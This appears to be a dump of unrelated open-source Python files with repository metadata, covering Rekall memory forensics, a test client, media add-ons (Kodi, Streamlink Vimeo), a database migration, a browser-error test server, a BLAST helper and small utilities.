[("Source IP", "source", "20"),
("Dest IP", "dest", "20"),
("Interface", "interface", "9"),
("Sent", "sent", "8"),
("Recv", "recv", "8"),
("Time", "timestamp", "24"),
("Expires", "expires", "8"),
("Delta", "delta", "8")])
route_tables = self.profile.get_constant_object(
"_rt_tables",
target="Array",
target_args=dict(
count=32,
target="Pointer",
target_args=dict(
target="radix_node_head")))
for node in self.rn_walk_tree(route_tables[2]):
rentry = node.dereference_as("rtentry")
renderer.table_row(
rentry.source_ip,
rentry.dest_ip,
rentry.name,
rentry.sent, rentry.rx,
rentry.base_calendartime,
rentry.rt_expire,
rentry.delta)
class DarwinIfnetHook(common.AbstractDarwinParameterHook):
"""Walks the global list of interfaces.
The head of the list of network interfaces is a kernel global [1].
The struct we use [2] is just the public part of the data [3]. Addresses
are related to an interface in a N:1 relationship [4]. AF-specific data
is a normal sockaddr struct.
References:
1:
https://github.com/opensource-apple/xnu/blob/10.9/bsd/net/dlil.c#L254
2:
https://github.com/opensource-apple/xnu/blob/10.9/bsd/net/if_var.h#L528
3:
https://github.com/opensource-apple/xnu/blob/10.9/bsd/net/dlil.c#L188
4:
https://github.com/opensource-apple/xnu/blob/10.9/bsd/net/if_var.h#L816
"""
name = "ifconfig"
# ifnet_head is the actual extern holding ifnets and seems to be an
# improvement over dlil_ifnet_head, which is a static and used only in the
# dlil (stands for data link interface, I think?) module.
IFNET_HEAD_NAME = ("_ifnet_head", "_dlil_ifnet_head")
def calculate(self):
ifnet_head = obj.NoneObject("No ifnet global names given.")
for name in self.IFNET_HEAD_NAME:
ifnet_head = self.session.profile.get_constant_object(
name,
target="Pointer",
target_args=dict(
target="ifnet"))
if ifnet_head:
break
return [x.obj_offset for x in ifnet_head.walk_list("if_link.tqe_next")]
class DarwinIfnetCollector(common.AbstractDarwinCachedProducer):
name = "ifconfig"
type_name = "ifnet"
class DarwinIPFilters(common.AbstractDarwinCommand):
"""Check IP Filters for hooks."""
__name = "ip_filters"
def render(self, renderer):
renderer.table_header([
("Context", "context", "10"),
("Filter", "filter", "16"),
("Handler", "handler", "[addrpad]"),
("Symbol", "symbol", "20")])
resolver = self.session.address_resolver
for list_name in ["_ipv4_filters", "_ipv6_filters"]:
filter_list = self.profile.get_constant_object(
list_name, target="ipfilter_list")
for item in filter_list.tqh_first.walk_list("ipf_link.tqe_next"):
filter = item.ipf_filter
name = filter.name.deref()
handler = filter.ipf_input.deref()
renderer.table_row("INPUT", name, handler,
resolver.format_address(handler))
handler = filter.ipf_output.deref()
renderer.table_row("OUTPUT", name, handler,
resolver.format_address(handler))
handler = filter.ipf_detach.deref()
renderer.table_row("DETACH", name, handler,
resolver.format_address(handler))
|
dsweet04/rekall
|
rekall-core/rekall/plugins/darwin/networking.py
|
Python
|
gpl-2.0
| 13,974
|
from __future__ import print_function
import argparse
import collections
import io
import json
import logging
import os
# pylint: disable=import-error
import queue
import random
import re
import requests
import sys
import traceback
import threading
import time
from ..core import provider
from ..utils import rnd
from . import window
logger = logging.getLogger('dice')
class _TestThread(threading.Thread):
"""
Thread class for running the main tests.
"""
def __init__(self, exc_queue, app, **kwargs):
threading.Thread.__init__(self, **kwargs)
self.exc_queue = exc_queue
self.app = app
def run(self):
try:
self.app.run_tests()
# pylint: disable=broad-except
except Exception:
self.exc_queue.put(sys.exc_info())
class _TestStat(object):
"""
Class to store the tests and statistics information.
"""
def __init__(self, key, queue_max=100, method='exact'):
self.key = key
self.counter = 0
self.queue_max = queue_max
self.method = method
self.queue = collections.deque([], queue_max)
def match(self, text):
if self.method == 'exact':
return text == self.key
elif self.method == 'regex':
return re.match(self.key + '$', text)
def append(self, result):
self.counter += 1
self.queue.append(result)
def extend(self, stat):
for result in stat.queue:
self.append(result)
class DiceApp(object):
"""
Curses-based DICE client application.
"""
def __init__(self):
self.parser = argparse.ArgumentParser()
self.parser.add_argument(
'providers',
nargs='?',
action='store',
help="list of test providers separated by ','. Default to current "
"working directory",
default=os.getcwd(),
)
self.parser.add_argument(
'--server',
action='store',
help='server address',
dest='server',
default=None,
)
self.parser.add_argument(
'--port',
action='store',
help='server port',
dest='port',
default='8067',
)
self.parser.add_argument(
'--username',
action='store',
help='server authentication user name',
dest='username',
)
self.parser.add_argument(
'--password',
action='store',
help='server authentication password',
dest='password',
)
self.parser.add_argument(
'--no-ui',
action='store_false',
help="don't show terminal interactive user interface.",
dest='ui',
default=True,
)
self.args, _ = self.parser.parse_known_args()
try:
self.providers = self._process_providers()
except provider.ProviderError as detail:
exit(detail)
self.stats = {
"skip": {},
"failure": {},
"success": {},
"timeout": {},
"expected_neg": {},
"unexpected_neg": {},
"unexpected_pass": {},
}
self.QUEUE_MAX = 100
self.exiting = False
self.pause = False
self.setting_watch = False
self.show_log = False
self.watching = ''
self.scroll_x = 0
self.scroll_y = 0
self.test_excs = queue.Queue()
self.test_thread = _TestThread(self.test_excs, self)
self.send_queue = []
self.last_send_thread = None
self.last_item = None
self.cur_counter = 'failure'
if self.args.ui:
self.window = window.Window(self)
self.window.stat_panel.set_select_callback(self._update_items)
self.window.stat_panel.add_keypress_listener(
'merge_stat', 'm', self._merge_stat)
self.window.items_panel.set_select_callback(self._update_content)
self.stream = io.StringIO()
self.cur_class = (None, None)
self.cur_item = (None, None)
def _update_items(self, cat_name, item_idx):
self.cur_class = (cat_name, item_idx)
def _update_content(self, cat_name, item_idx):
self.cur_item = (cat_name, item_idx)
def _merge_stat(self, panel):
self.pause = True
cat_name, _ = panel.cur_key
text = self.window.get_input()
match_keys = []
for key in self.stats[cat_name]:
res = re.match(text, key)
if res is not None:
match_keys.append(key)
stat = self.stats[cat_name][text] = _TestStat(text, method='regex')
for key in match_keys:
stat.extend(self.stats[cat_name][key])
del self.stats[cat_name][key]
self.pause = False
def _stat_result(self, item):
"""
Categorizes and keep the count of a result of a test item depends on
the expected failure patterns.
"""
res = item.res
fail_patts = item.fail_patts
key = res.stderr
catalog = None
if res:
if res.exit_status == 'timeout':
catalog = 'timeout'
if self.watching and self.watching in res.stderr:
self.pause = True
if fail_patts:
if res.exit_status == 'success':
catalog = 'unexpected_pass'
elif res.exit_status == 'failure':
found = False
for patt in fail_patts:
if re.search(patt, res.stderr):
catalog = 'expected_neg'
key = patt
found = True
break
if not found:
catalog = 'unexpected_neg'
else:
if res.exit_status == 'success':
catalog = 'success'
elif res.exit_status == 'failure':
catalog = 'failure'
else:
catalog = 'skip'
found = False
for stat in self.stats[catalog].values():
if stat.match(key):
found = True
key = stat.key
break
if not found:
self.stats[catalog][key] = _TestStat(key)
stat = self.stats[catalog][key]
stat.append(res)
def _process_providers(self):
"""
Print a list of available providers if --list-providers is set
or return a dict of specified providers.
"""
providers = {}
if self.args.providers:
for path in self.args.providers.split(','):
prvdr = provider.Provider(path)
providers[prvdr.name] = prvdr
else:
sys.exit('Error: --providers option not specified')
return providers
def _send(self, item_queue):
"""
Serialize a list of test results and send them to remote server.
"""
content = []
for item in item_queue:
content.append(item.serialize())
data = json.dumps(content)
headers = {}
headers['content-type'] = 'application/json'
url = 'http://%s:%s/api/tests/' % (self.args.server, self.args.port)
try:
response = requests.post(
url,
data=data,
headers=headers,
auth=(self.args.username, self.args.password),
)
if response.status_code != 201:
logger.debug('Failed to send result (HTTP%s):',
response.status_code)
if 'DOCTYPE' in response.text:
html_path = 'debug_%s.html' % rnd.regex('[a-z]{4}')
with open(html_path, 'w') as fp:
fp.write(response.text)
logger.debug('Html response saved to %s',
os.path.abspath(html_path))
else:
logger.debug(response.text)
except requests.ConnectionError as detail:
logger.debug('Failed to send result to server: %s', detail)
def run_tests(self):
"""
Iteratively run tests.
"""
while not self.exiting:
item = random.choice(self.providers.values()).generate()
item.run()
self.last_item = item
if self.args.server is not None:
self.send_queue.append(item)
if len(self.send_queue) > 200:
if self.last_send_thread:
self.last_send_thread.join()
send_thread = threading.Thread(
target=self._send,
args=(self.send_queue,)
)
send_thread.start()
self.last_send_thread = send_thread
self.send_queue = []
self._stat_result(item)
if self.pause:
while self.pause and not self.exiting:
time.sleep(0.5)
def update_window(self):
"""
Update the content of curses window and refresh it.
"""
# Set statistics panel content
panel = self.window.stat_panel
panel.clear()
for cat_name in self.stats:
for key, stat in self.stats[cat_name].items():
bundle = {'key': key, 'count': stat.counter}
panel.add_item(bundle, catalog=cat_name)
# Set items panel content
panel = self.window.items_panel
panel.clear()
cat_name, item_idx = self.cur_class
if cat_name is not None and item_idx is not None:
item_name, stat = self.stats[cat_name].items()[item_idx]
try:
for item in self.stats[cat_name][item_name].queue:
bundle = {'item': item.cmdline}
panel.add_item(bundle)
except RuntimeError:
pass
# Set detail panel content
panel = self.window.detail_panel
panel.clear()
cat_name, item_idx = self.cur_class
if cat_name is not None and item_idx is not None:
item_name, stat = self.stats[cat_name].items()[item_idx]
items = self.stats[cat_name][item_name].queue
item_name, item_idx = self.cur_item
if item_name is not None and item_idx is not None:
bundle = items[self.cur_item[1]]
panel.set_content(bundle)
self.window.update()
def run(self):
"""
Main loop to run tests, update screen and send tests results.
"""
shandler = logging.StreamHandler(self.stream)
logger.setLevel(logging.WARNING)
for handler in logger.handlers:
logger.removeHandler(handler)
logger.addHandler(shandler)
os.environ["EDITOR"] = "echo"
self.last_item = None
if self.args.ui:
try:
self.test_thread.start()
while True:
if self.args.ui:
self.update_window()
if self.exiting:
break
if not self.test_thread.isAlive():
break
except KeyboardInterrupt:
pass
finally:
if self.args.ui:
self.window.destroy()
self.exiting = True
self.test_thread.join()
try:
exc = self.test_excs.get(block=False)
for line in traceback.format_exception(*exc):
print(line, end='')
except queue.Empty:
pass
else:
self.run_tests()
|
code-dice/dice
|
dice/client/__init__.py
|
Python
|
gpl-2.0
| 12,056
|
import sys, xbmcplugin, xbmcgui,xbmc
_id = "plugin.video.italian-news"
_resdir = "special://home/addons/" + _id + "/resources"
_thisPlugin = int(sys.argv[1])
_icons = _resdir + "/icons/"
sys.path.append( xbmc.translatePath(_resdir + "/lib/"))
import rai
_tg1Icon=xbmc.translatePath(_icons +"Tg1_logo.png")
_tg2Icon=xbmc.translatePath(_icons +"Tg2_logo.png")
_tg3Icon=xbmc.translatePath(_icons +"Tg3_logo.png")
def _addItem(label,uri,icon,isFolder=False):
item = xbmcgui.ListItem(label, iconImage=icon)
xbmcplugin.addDirectoryItem(_thisPlugin,uri,item,isFolder)
def _get_params():
param=[]
paramstring=sys.argv[2]
if len(paramstring)>=2:
params=sys.argv[2]
cleanedparams=params.replace('?','')
if (params[len(params)-1]=='/'):
params=params[0:len(params)-2]
pairsofparams=cleanedparams.split('&')
param={}
for i in range(len(pairsofparams)):
splitparams={}
splitparams=pairsofparams[i].split('=')
if (len(splitparams))==2:
param[splitparams[0]]=splitparams[1]
return param
param = _get_params()
plugins = {
'1':(rai.RaiUno, 'Guarda il TG1',_tg1Icon),
'2':(rai.RaiDue, 'Guarda il TG2',_tg2Icon),
'3':(rai.RaiTre, 'Guarda il TG3',_tg3Icon)
}
if 'plugin' in param:
(engine, title, eicon)=plugins[param['plugin']]
for (name,url,icon) in engine().get():
if icon == '':
icon = eicon
_addItem(name,url,icon)
xbmcplugin.endOfDirectory(_thisPlugin)
else:
for n in sorted(plugins.iterkeys()):
(engine, title, icon)=plugins[n]
print title
_addItem(title,sys.argv[0]+'?plugin='+n,icon,isFolder=True)
xbmcplugin.endOfDirectory(_thisPlugin)
#for (name,url,icon) in tg1:
# _addItem(name,url,icon)
#xbmcplugin.endOfDirectory(_thisPlugin)
|
mikpin/plugin.video.italian-news
|
default.py
|
Python
|
gpl-2.0
| 1,928
|
#!/usr/bin/python3
def sanitize(time_string):
if '-' in time_string:
splitter = '-'
elif ':' in time_string:
splitter = ':'
else:
return(time_string)
(mins, secs) = time_string.strip().split(splitter)
return(mins + '.' + secs)
def get_coach_data(filename):
try:
with open(filename) as fn:
data = fn.readline()
return(data.strip().split(','))
except IOError as ioerr:
print('File Error:' + str(ioerr))
return(None)
sarah = get_coach_data('sarah2.txt')
(sarah_name, sarach_dob) = sarah.pop(0), sarah.pop(0)
print(sarah_name + "'s fastest time are:"+
str(sorted(set([sanitize(t) for t in sarah]))[0:3]))
|
clovemfeng/studydemo
|
20140617/userlist_data.py
|
Python
|
gpl-2.0
| 657
|
"""Add default COMPILE_YARA_RULE_ON_SAVE setting
Revision ID: af2de80654b6
Revises: 2f0f6d26a505
Create Date: 2018-11-11 19:26:53.631142
"""
from alembic import op
import sqlalchemy as sa
from app.models import cfg_settings
import datetime
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = 'af2de80654b6'
down_revision = '2f0f6d26a505'
branch_labels = None
depends_on = None
def upgrade():
date_created = datetime.datetime.now().isoformat()
date_modified = datetime.datetime.now().isoformat()
op.bulk_insert(
cfg_settings.Cfg_settings.__table__,
[
{"key": "COMPILE_YARA_RULE_ON_SAVE", "value": "1", "public": True, "date_created": date_created,
"date_modified": date_modified,
"description": "If true, don't save yara rule changes if they are in the draft or release state unless they compile."},
]
)
def downgrade():
keys = ["COMPILE_YARA_RULE_ON_SAVE"]
for key in keys:
op.execute("""DELETE from cfg_settings where `key`='%s';""" % (key))
|
InQuest/ThreatKB
|
migrations/versions/af2de80654b6_add_default_compile_yara_rule_on_save_.py
|
Python
|
gpl-2.0
| 1,083
|
#!/usr/bin/env python
import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import moviedata
class MainWindow(QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.movies = moviedata.MovieContainer()
self.table = QTableWidget()
self.setCentralWidget(self.table)
def updateTable(self, current=None):
self.table.clear()
self.table.setRowCount(len(self.movies))
self.table.setColumnCount(5)
self.table.setHorizontalHeaderLabels(['Title',
'Year', 'Mins', 'Acquired', 'Notes'])
self.table.setAlternatingRowColors(True)
self.table.setEditTriggers(QTableWidget.NoEditTriggers)
self.table.setSelectionBehavior(QTableWidget.SelectRows)
self.table.setSelectionMode(QTableWidget.SingleSelection)
selected = None
|
opensvn/python
|
mymovies.py
|
Python
|
gpl-2.0
| 877
|
# -*- coding: utf-8 -*-
# Copyright (C) 2011-2012 Vodafone España, S.A.
# Author: Andrew Bird
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from wader.common.consts import WADER_CONNTYPE_USB
from core.hardware.zte import (ZTEWCDMADevicePlugin,
ZTEWCDMACustomizer,
ZTEWrapper)
class ZTEMF180Wrapper(ZTEWrapper):
def send_ussd(self, ussd):
"""Sends the ussd command ``ussd``"""
# XXX: assumes it's the same as 637U
# MF180 wants request in ascii chars even though current
# set might be ucs2
return super(ZTEMF180Wrapper, self).send_ussd(ussd, force_ascii=True)
class ZTEMF180Customizer(ZTEWCDMACustomizer):
wrapper_klass = ZTEMF180Wrapper
class ZTEMF180(ZTEWCDMADevicePlugin):
""":class:`~core.plugin.DevicePlugin` for ZTE's MF180"""
name = "ZTE MF180"
version = "0.1"
author = u"Andrew Bird"
custom = ZTEMF180Customizer()
__remote_name__ = "MF180"
__properties__ = {
'ID_VENDOR_ID': [0x19d2],
'ID_MODEL_ID': [0x2003],
}
conntype = WADER_CONNTYPE_USB
zte_mf180 = ZTEMF180()
|
andrewbird/wader
|
plugins/devices/zte_mf180.py
|
Python
|
gpl-2.0
| 1,826
|
# Sketch - A Python-based interactive drawing program
# Copyright (C) 1999 by Bernhard Herzog
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# Select all objects in the current layer with the same fill color as
# the currently selected object. This is implemented as an advanced
# script. It doesn't have to deal with undo because it only changes the
# set of currently selected objects and not the objects themselves.
#
# Conceps and Methods:
#
# CurrentProperties():
#
# This document method returns the properties of the currently
# selected object. If more than one objects are selected or no
# object is selected or the selected object doesn't have
# properties, a special property object EmptyProperties is
# returned.
#
# Now, what does this mean? Objects like rectangles, text and
# curves have graphics properties like fill or line patters, line
# width or font whatever is applicable for that particular type.
# Some obejcts have no graphics properties at all, e.g. groups,
# while others can only have some properties, e.g. text objects
# currently can't have a line color (this is really a limitation
# in X11, PostScript wouldn't have problems with that).
#
# All of the properties are stored in a properties object, and
# that is what the CurrentProperties() method returns. Such a
# properties object has three methods that indicate whether the
# fill-, line- or text properties are valid: HasFill(), HasLine()
# and HasFont(). Only if one of those methods returns true, can
# you safely access the respective properties. The properties are
# publicly readable attributes of the properties object. For the
# EmptyProperties object that may be returned by
# CurrentProperties(), all of these methods return false.
#
import time
def select_same_fill_color(context):
doc = context.document
select = []
properties = doc.CurrentProperties()
if properties.HasFill():
color = properties.fill_pattern.Color()
layer = doc.ActiveLayer()
doc.SelectNone()
for obj in layer.GetObjects():
if obj.has_fill:
prop = obj.Properties()
if prop.HasFill() and prop.fill_pattern.is_Solid \
and color == prop.fill_pattern.Color():
select.append(obj)
doc.SelectObject(select, Sketch.const.SelectAdd)
# register script
import Sketch.Scripting
Sketch.Scripting.AddFunction('select_same_fill_color',
'Select Same Fill Color',
select_same_fill_color,
script_type = Sketch.Scripting.AdvancedScript)
|
shumik/skencil-c
|
Script/select_same_fill_color.py
|
Python
|
gpl-2.0
| 3,431
|
import logging
import re
from streamlink.compat import html_unescape, urlparse
from streamlink.plugin import Plugin, PluginArguments, PluginArgument
from streamlink.plugin.api import validate
from streamlink.stream import DASHStream, HLSStream, HTTPStream
from streamlink.stream.ffmpegmux import MuxedStream
from streamlink.utils import parse_json
log = logging.getLogger(__name__)
class Vimeo(Plugin):
_url_re = re.compile(r"https?://(player\.vimeo\.com/video/\d+|(www\.)?vimeo\.com/.+)")
_config_url_re = re.compile(r'(?:"config_url"|\bdata-config-url)\s*[:=]\s*(".+?")')
_config_re = re.compile(r"var\s+config\s*=\s*({.+?})\s*;")
_config_url_schema = validate.Schema(
validate.transform(_config_url_re.search),
validate.any(
None,
validate.Schema(
validate.get(1),
validate.transform(parse_json),
validate.transform(html_unescape),
validate.url(),
),
),
)
_config_schema = validate.Schema(
validate.transform(parse_json),
{
"request": {
"files": {
validate.optional("dash"): {"cdns": {validate.text: {"url": validate.url()}}},
validate.optional("hls"): {"cdns": {validate.text: {"url": validate.url()}}},
validate.optional("progressive"): validate.all(
[{"url": validate.url(), "quality": validate.text}]
),
},
validate.optional("text_tracks"): validate.all(
[{"url": validate.text, "lang": validate.text}]
),
}
},
)
_player_schema = validate.Schema(
validate.transform(_config_re.search),
validate.any(None, validate.Schema(validate.get(1), _config_schema)),
)
arguments = PluginArguments(
PluginArgument(
"mux-subtitles",
action="store_true",
help="Automatically mux available subtitles in to the output stream.",
)
)
@classmethod
def can_handle_url(cls, url):
return cls._url_re.match(url)
def _get_streams(self):
if "player.vimeo.com" in self.url:
data = self.session.http.get(self.url, schema=self._player_schema)
else:
api_url = self.session.http.get(self.url, schema=self._config_url_schema)
if not api_url:
return
data = self.session.http.get(api_url, schema=self._config_schema)
videos = data["request"]["files"]
streams = []
for stream_type in ("hls", "dash"):
if stream_type not in videos:
continue
for _, video_data in videos[stream_type]["cdns"].items():
log.trace("{0!r}".format(video_data))
url = video_data.get("url")
if stream_type == "hls":
for stream in HLSStream.parse_variant_playlist(self.session, url).items():
streams.append(stream)
elif stream_type == "dash":
p = urlparse(url)
if p.path.endswith("dash.mpd"):
# LIVE
url = self.session.http.get(url).json()["url"]
elif p.path.endswith("master.json"):
# VOD
url = url.replace("master.json", "master.mpd")
else:
log.error("Unsupported DASH path: {0}".format(p.path))
continue
for stream in DASHStream.parse_manifest(self.session, url).items():
streams.append(stream)
for stream in videos.get("progressive", []):
streams.append((stream["quality"], HTTPStream(self.session, stream["url"])))
if self.get_option("mux_subtitles") and data["request"].get("text_tracks"):
substreams = {
s["lang"]: HTTPStream(self.session, "https://vimeo.com" + s["url"])
for s in data["request"]["text_tracks"]
}
for quality, stream in streams:
yield quality, MuxedStream(self.session, stream, subtitles=substreams)
else:
for stream in streams:
yield stream
__plugin__ = Vimeo
|
repotvsupertuga/tvsupertuga.repository
|
script.module.streamlink.base/resources/lib/streamlink/plugins/vimeo.py
|
Python
|
gpl-2.0
| 4,404
|
import socket, sys, time, argparse
parser = argparse.ArgumentParser(description="This bad server accepts an HTTP connection and replies with a valid HTML document which links to assets. However, attemps to load the assets should result in a net::ERR_EMPTY_RESPONSE.")
parser.add_argument("-p", "--port", type=int, help="The port to listen for new connections on.", default=8080)
parser.add_argument("-t", "--tries", type=int, help="The number of attempts before asset requests will be responded to successfully", default=5)
args = parser.parse_args()
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('localhost', args.port))
serversocket.listen(5)
print "The bad web server is listening on port %s. Requests for the HTML index will always be replied to. Assets requests will be responded to after %s unsuccessful attempts.\n" % (args.port, args.tries)
response_text = """HTTP/1.0 200 OK
Server: BadWebServer v0.1
Content-Type: text/html
<!DOCTYPE html>
<head>
<meta charset="utf-8">
<title>Bad Web Server</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js"></script>
<script src="/script.js" id="script01"></script>
<script type="text/javascript">
function refresh_location_hints() {
$('#for_script01').val($('#script01').attr('src'));
$('#for_css01').val($('#css01').attr('href'));
$('#for_img01').val($('#img01').attr('src'));
$('#img01').attr('alt', $('#img01').attr('src'));
setTimeout(function() {
refresh_location_hints();
}, 1000);
}
$(document).ready(function() {
setTimeout(function() {
refresh_location_hints();
}, 1000);
});
</script>
<style>
input { width: 600px; }
</style>
</head>
<body>
<header>
<h1>About Bad Web Server</h1>
<p>The bad web server will correctly transfer a valid HTML5 document to the browser when the browser requests the resource identified as '/'. The page will also request images, stylesheets and javascript resources from the server - but these should all result in the browser encountering a socket error and triggering a net::ERR_EMPTY_RESPONSE. The javascript will correctly load after the 5th attempt and display an alert to the user when it loads correctly, as will the CSS resource. We also import JQuery to dynamicly hint at the current location of each failed resource for testing.</p>
</header>
<article>
<input type="text" id="for_script01"> External Script (#script01) URL<br>
</article>
</body>
</html>"""
js_response_text = """HTTP/1.0 200 OK
Server: BadWebServer v0.1
Content-Type: text/javascript
alert("Javascript resource ('#script_01') loaded successfully after %s attempts");""" % args.tries
css_response_text = """HTTP/1.0 200 OK
Server: BadWebServer v0.1
Content-Type: text/stylesheet
* { margin: 5px; padding: 5px; }
body { background-color: #00ff00; color: #555555; }"""
css_requests = js_requests = 0
while True:
#accept connections from outside
(clientsocket, address) = serversocket.accept()
chunks = []
bytes_recd = 0
chunk = ""
while "\r\n\r\n" not in chunk:
chunk = clientsocket.recv(min(2048 - bytes_recd, 2048))
if chunk == '':
raise RuntimeError("socket connection broken (but not by me)")
chunks.append(chunk)
bytes_recd = bytes_recd + len(chunk)
header = ''.join(chunks)
print "Received: " + header
request_line = header.split("\r\n")[0]
resource_marker = request_line.split()[1]
if resource_marker is "/" or resource_marker is "/index.html" or resource_marker is "/index.htm":
print "^ INDEX - WILL REPLY ^"
clientsocket.send(response_text);
clientsocket.shutdown(0)
elif ".css" in resource_marker:
css_requests += 1
if css_requests > args.tries:
css_requests = 0
print "^ FINAL CSS REQUEST - WILL REPLY ^"
clientsocket.send(css_response_text)
clientsocket.shutdown(0)
else:
print "^ CSS REQUEST #%s - WILL NOT REPLY ^" % css_requests
elif ".js" in resource_marker:
js_requests += 1
if js_requests > args.tries:
js_requests = 0
print "^ FINAL JS REQUEST - WILL REPLY ^"
clientsocket.send(js_response_text)
clientsocket.shutdown(0)
else:
print "^ JS REQUEST #%s - WILL NOT REPLY ^" % js_requests
else:
print "^ WILL NOT REPLY ^"
print "\n"
clientsocket.close()
|
djcf/error-reloader-extension
|
tests/badwebserver_jsonly.py
|
Python
|
gpl-2.0
| 4,289
|
# Copyright 2009 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import array
import tempfile
from portage import _unicode_decode
from portage import _unicode_encode
from portage.tests import TestCase
class ArrayFromfileEofTestCase(TestCase):
def testArrayFromfileEof(self):
# This tests if the following python issue is fixed
# in the currently running version of python:
# http://bugs.python.org/issue5334
input_data = "an arbitrary string"
input_bytes = _unicode_encode(input_data,
encoding='utf_8', errors='strict')
f = tempfile.TemporaryFile()
f.write(input_bytes)
f.seek(0)
data = []
eof = False
while not eof:
a = array.array('B')
try:
a.fromfile(f, len(input_bytes) + 1)
except (EOFError, IOError):
# python-3.0 lost data here
eof = True
if not a:
eof = True
else:
data.append(_unicode_decode(a.tostring(),
encoding='utf_8', errors='strict'))
f.close()
self.assertEqual(input_data, ''.join(data))
|
Neuvoo/legacy-portage
|
pym/portage/tests/ebuild/test_array_fromfile_eof.py
|
Python
|
gpl-2.0
| 1,023
|
"""audio driver subsystem"""
from os.path import exists
from os import environ
from subprocess import check_call
from functools import partial
from .drive import Driver
import click
DRIVE_QUEUE = 'a.drive'
CTL_PATH = '{}/.config/pianobar/ctl'.format(environ['HOME'])
COMMANDS = {'p', 'n', '^', '(', ')'}
def callback(ctl:'file_t', cmd:str) -> "IO ()":
"""writes command to ctl pipe"""
if cmd not in COMMANDS:
return
ctl.write(cmd)
ctl.flush()
@click.command()
@click.option('--ctl_path', default=CTL_PATH)
@click.option('--queue', default=DRIVE_QUEUE)
def main(ctl_path:str, queue:str) -> "IO ()":
"""daemon for a.drive queue consumption"""
if not exists(ctl_path):
with open('/dev/null', 'w') as null:
check_call(['pianoctl'], stdout=null)
with open(ctl_path, 'w') as ctl:
Driver(callback=partial(callback, ctl), queue=queue).drive()
|
acm-uiuc/DJ-Roomba
|
dj_roomba/adrive.py
|
Python
|
gpl-2.0
| 906
|
import sys,os,string
def GFX_MenuDialog(filename,*items):
file=open(filename,'w')
file.writelines(map(lambda x:x+"\n", items))
file.close()
os.system("python X11_MenuDialog.py "+filename);
if __name__=="__main__":
import qt,string
class WidgetView ( qt.QWidget ):
def __init__( self, *args ):
apply( qt.QWidget.__init__, (self,) + args )
self.topLayout = qt.QVBoxLayout( self, 10 )
self.grid = qt.QGridLayout( 0, 0 )
self.topLayout.addLayout( self.grid, 10 )
# Create a list box
self.lb = qt.QListBox( self, "listBox" )
file=open(sys.argv[1],'r')
self.dasitems=map(lambda x:string.rstrip(x),file.readlines())
file.close()
self.setCaption(self.dasitems.pop(0))
for item in self.dasitems:
self.lb.insertItem(item)
self.grid.addMultiCellWidget( self.lb, 0, 0, 0, 0 )
self.connect( self.lb, qt.SIGNAL("selected(int)"), self.listBoxItemSelected )
self.topLayout.activate()
def listBoxItemSelected( self, index ):
txt = qt.QString()
txt = "List box item %d selected" % index
print txt
file=open(sys.argv[1],'w')
file.write(self.dasitems[index])
file.close();
a.quit()
a = qt.QApplication( sys.argv )
w = WidgetView()
a.setMainWidget( w )
w.show()
a.exec_loop()
|
kmatheussen/radium
|
bin/old/X11_MenuDialog.py
|
Python
|
gpl-2.0
| 1,375
|
####### LICENSE #######
# This code is part of the Recombineering module, written by Gregory
# Moyerbrailean at Michigan State University, Department of Microbiology
# and Molecular Genetics.
# Copyright (C) 2010 Gregory Moyerbrailean
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
'''Handles the local BLAST and the parsing of the results.
The BLAST uses the NCBI blast+ command-line tools to run a local BLAST against
the organism's genome. In the event that a closed genome is not available for
a species, the genome of a closely related strain can be used in its place.
When a hit has been found, the parser function will extract and return relevant
information regarding the corresponding gene.
Alternatively, the user may specify to disable the BLAST function. In this case,
the module will use the scaffold files to extract the necessary information.
The user therefore does not have to have the blast+ command-line tools.
However, the user will also not be able to run organisms such as L. reuteri
against a similar genome, as this method requires exact gene matches.'''
import subprocess
from Bio.Blast.Applications import NcbiblastnCommandline as ncl
from Bio.Blast import NCBIXML as nxml
def BlastGenome(queryFile,genome,debug,outputFile='Files/extras/temp_blast.xml'):
if debug:
print "In BLASTing.BlastGenome"
# Modify the genome filename to reflect the path to the genome
genome = genome.replace(' ','')
genomePath = 'Files/genome/' + genome + '/' + genome
## Call blast+ from python
cline = ncl(query=queryFile,db=genomePath,out=outputFile,outfmt=5)
ret_code = subprocess.call(str(cline),shell=True)
if ret_code:
print 'BLASTing file "%s" returned error code %s' % (queryFile,ret_code)
temp = open(queryFile).read()
geneID = temp.split()[0]
geneID = geneID.lstrip('>')
result = nxml.read(open(outputFile))
# If the blast returns no results, it will be treated as a gene
# in the ambiguous region and oligos will be made from both strands
if result.alignments:
return parseRecord(result,genomePath,debug)
else:
return 0,0,'Ambiguous','No Match','N/A'
def parseRecord(xmlfile,genomePath,debug):
if debug:
print "In BLASTing.parseRecord"
result = nxml.read(open('Files/extras/temp_blast.xml'))
hit = result.alignments[0].hit_def
